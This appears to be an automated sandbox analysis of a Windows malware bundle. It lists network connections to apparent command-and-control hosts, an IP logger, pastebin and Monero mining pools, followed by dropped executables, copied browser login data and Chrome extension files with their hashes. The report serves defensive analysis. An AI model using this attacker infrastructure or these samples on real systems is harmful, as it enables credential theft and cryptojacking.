US 8.8.8.8:53 35.221.240.157.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net udp
GB 157.240.214.11:443 static.xx.fbcdn.net udp
US 8.8.8.8:53 11.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 51.210.150.92:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 pastebin.com udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 162.19.224.121:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 121.224.19.162.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 0182d7dcdb4e1d8c87ef13ccca528b16
SHA1 f0f3d321a0829992d81bba5460abad5c555439cd
SHA256 1f4d8c3b8625c3506e6907a4e50e2f43cd851cbde208af218e50a9994b35388b
SHA512 f21c3d8792e805ef3aceaf294385c383e0db4964d36a51654f82b97a448349631a1b829e9602ca78e60caa89311d85a7b569636766521c9f2de167e28860beb9

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

memory/396-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-53-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe

MD5 0f3487e49d6f3a5c1846cd9eebc7e3fc
SHA1 17ba797b3d36960790e7b983c432f81ffb9df709
SHA256 fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a
SHA512 fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe

MD5 e2213d70937e476e7a778f1712912131
SHA1 f8f09b6965c83c361210a1b11c8039b7ca9a30b9
SHA256 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b
SHA512 cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe

MD5 46e9d76672b9d24ba14ea963574cc6a2
SHA1 caf88d470dc1241aca2b159b26953194a8d59cca
SHA256 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7
SHA512 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe

MD5 77c7866632ae874b545152466fce77ad
SHA1 f48e76c8478a139ea77c03238a0499cfa1fc8cea
SHA256 e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43
SHA512 e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe

MD5 5c2e28dedae0e088fc1f9b50d7d28c12
SHA1 f521d9d8ae7381e3953ae5cf33b4b1b37f67a193
SHA256 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f
SHA512 f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

memory/396-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-47-0x0000000064940000-0x0000000064959000-memory.dmp

memory/396-46-0x0000000064941000-0x000000006494F000-memory.dmp

memory/396-45-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-44-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/396-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/1004-114-0x0000000000DA0000-0x0000000000DCC000-memory.dmp

memory/1452-103-0x0000000000970000-0x0000000000978000-memory.dmp

memory/1004-116-0x0000000001580000-0x0000000001586000-memory.dmp

memory/2708-117-0x0000000000070000-0x000000000015E000-memory.dmp

memory/4464-118-0x0000000000A10000-0x0000000000B52000-memory.dmp

memory/1004-120-0x0000000001590000-0x00000000015B0000-memory.dmp

memory/4464-122-0x0000000005450000-0x00000000054E2000-memory.dmp

memory/4464-121-0x0000000005920000-0x0000000005EC4000-memory.dmp

memory/1004-123-0x00000000015B0000-0x00000000015B6000-memory.dmp

memory/4464-125-0x0000000005770000-0x000000000580C000-memory.dmp

memory/4464-124-0x0000000005410000-0x000000000541A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2968-138-0x0000000000A00000-0x0000000000A10000-memory.dmp

memory/2488-149-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1516-162-0x00000000009D0000-0x0000000000AB4000-memory.dmp

memory/396-172-0x0000000000400000-0x0000000000BD8000-memory.dmp

memory/396-181-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/396-179-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-176-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2936-182-0x0000000000400000-0x0000000002C6D000-memory.dmp

memory/4464-183-0x0000000001400000-0x0000000001412000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Login Data For Account

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 b50765fc873de01b9b93ef8908a5cf55
SHA1 0901ef992a9e9ddd54ee41f87cfbb86b1755ea1d
SHA256 ad7f3e95c541c12a952b76631045e63f1ea53d414b4273df5226c85c218cf1df
SHA512 7ca11d4aa67ef7f39848ed768d5bf5996857aaf78992b3d73cd932b8c5682f5f84afaab14da4a43cda01398c1c87895f02bb135803bffef2130e09bb88b58be1

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\000003.log

MD5 891a884b9fa2bff4519f5f56d2a25d62
SHA1 b54a3c12ee78510cb269fb1d863047dd8f571dea
SHA256 e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e
SHA512 cd50c3ee4dfb9c4ec051b20dd1e148a5015457ee0c1a29fff482e62291b32097b07a069db62951b32f209fd118fd77a46b8e8cc92da3eaae6110735d126a90ee

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

memory/1828-389-0x0000000000400000-0x0000000002CC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json

MD5 f0b8f439874eade31b42dad090126c3e
SHA1 9011bca518eeeba3ef292c257ff4b65cba20f8ce
SHA256 20d39e65b119ed47afd5942d2a67e5057e34e2aef144569796a19825fea4348e
SHA512 833e3e30f091b4e50364b10fc75258e8c647ddd3f32d473d1991beda0095827d02f010bf783c22d8f8a3fa1433b6b22400ad93dc34b0eb59a78e1e18e7d9b05f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\aes.js

MD5 4ff108e4584780dce15d610c142c3e62
SHA1 77e4519962e2f6a9fc93342137dbb31c33b76b04
SHA256 fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a
SHA512 d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\jquery-3.3.1.min.js

MD5 a09e13ee94d51c524b7e2a728c7d4039
SHA1 0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae
SHA256 160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef
SHA512 f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\mode-ecb.js

MD5 23231681d1c6f85fa32e725d6d63b19b
SHA1 f69315530b49ac743b0e012652a3a5efaed94f17
SHA256 03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a
SHA512 36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\pad-nopadding.js

MD5 0f26002ee3b4b4440e5949a969ea7503
SHA1 31fc518828fe4894e8077ec5686dce7b1ed281d7
SHA256 282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d
SHA512 4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\content.js

MD5 dd274022b4205b0da19d427b9ac176bf
SHA1 91ee7c40b55a1525438c2b1abe166d3cb862e5cb
SHA256 41e129bb90c2ac61da7dac92a908559448c6448ba698a450b6e7add9493739c6
SHA512 8ee074da689a7d90eca3c8242f7d16b0390b8c9b133d7bbdef77f8bf7f9a912e2d60b4a16f1c934f1bd38b380d6536c23b3a2f9939e31a8ef9f9c539573387b4

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\background.js

MD5 2098797393986a512c91cc3508a6a1d3
SHA1 d0b403c8b63d4ae203c71a4f2aa868d4099fb059
SHA256 4f7c1f1bb05ee85f65f3263a5cb353d04cc574013ed0f17640642ce2c953be33
SHA512 faf434ccb8eac865601ab86585b483a423f6d9949d0fd04635425c2c272fea901bb99dc7fbfc0a79a0fbeb59e30a2a2b48381b713a14399ee31b22effccc6bdb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\icon.png

MD5 c8d8c174df68910527edabe6b5278f06
SHA1 8ac53b3605fea693b59027b9b471202d150f266f
SHA256 9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5
SHA512 d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\background.html

MD5 9ffe618d587a0685d80e9f8bb7d89d39
SHA1 8e9cae42c911027aafae56f9b1a16eb8dd7a739c
SHA256 a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e
SHA512 a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\messages.json

MD5 91f5bc87fd478a007ec68c4e8adf11ac
SHA1 d07dd49e4ef3b36dad7d038b7e999ae850c5bef6
SHA256 92f1246c21dd5fd7266ebfd65798c61e403d01a816cc3cf780db5c8aa2e3d9c9
SHA512 fdc2a29b04e67ddbbd8fb6e8d2443e46badcb2b2fb3a850bbd6198cdccc32ee0bd8a9769d929feefe84d1015145e6664ab5fea114df5a864cf963bf98a65ffd9

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\index

MD5 95c07d8a71623f41508b2ff47ca82226
SHA1 d4ad0917270a5006f3be6ca2b19e003d2522ea23
SHA256 824639e8587bd6deccb361cd6ccf061e82b76e97745b4cdaf09cf22cf59f4452
SHA512 e0315b36ce709657de426e5f549864a1de635e86c174379d36757d7deb300a11ac40d5938a32f00e304a1a41c9e5f2eb7806296c898642ffc3b187041c9ad9a9

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db

MD5 491de38f19d0ae501eca7d3d7d69b826
SHA1 2ecf6fcf189ce6d35139daf427a781ca66a1eba9
SHA256 e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a
SHA512 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 013b18b14247306181ec7ae01d24aa15
SHA1 5ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256 edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA512 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 54ad0d820f5eedc3ccb93a548fca33fc
SHA1 378ab33d0a1fa2ec748c893d68c279a2073dd2d7
SHA256 28e8d4844e25f157663e4e4a95e038dd0a5f27bc14f41ac40e74bb184401936b
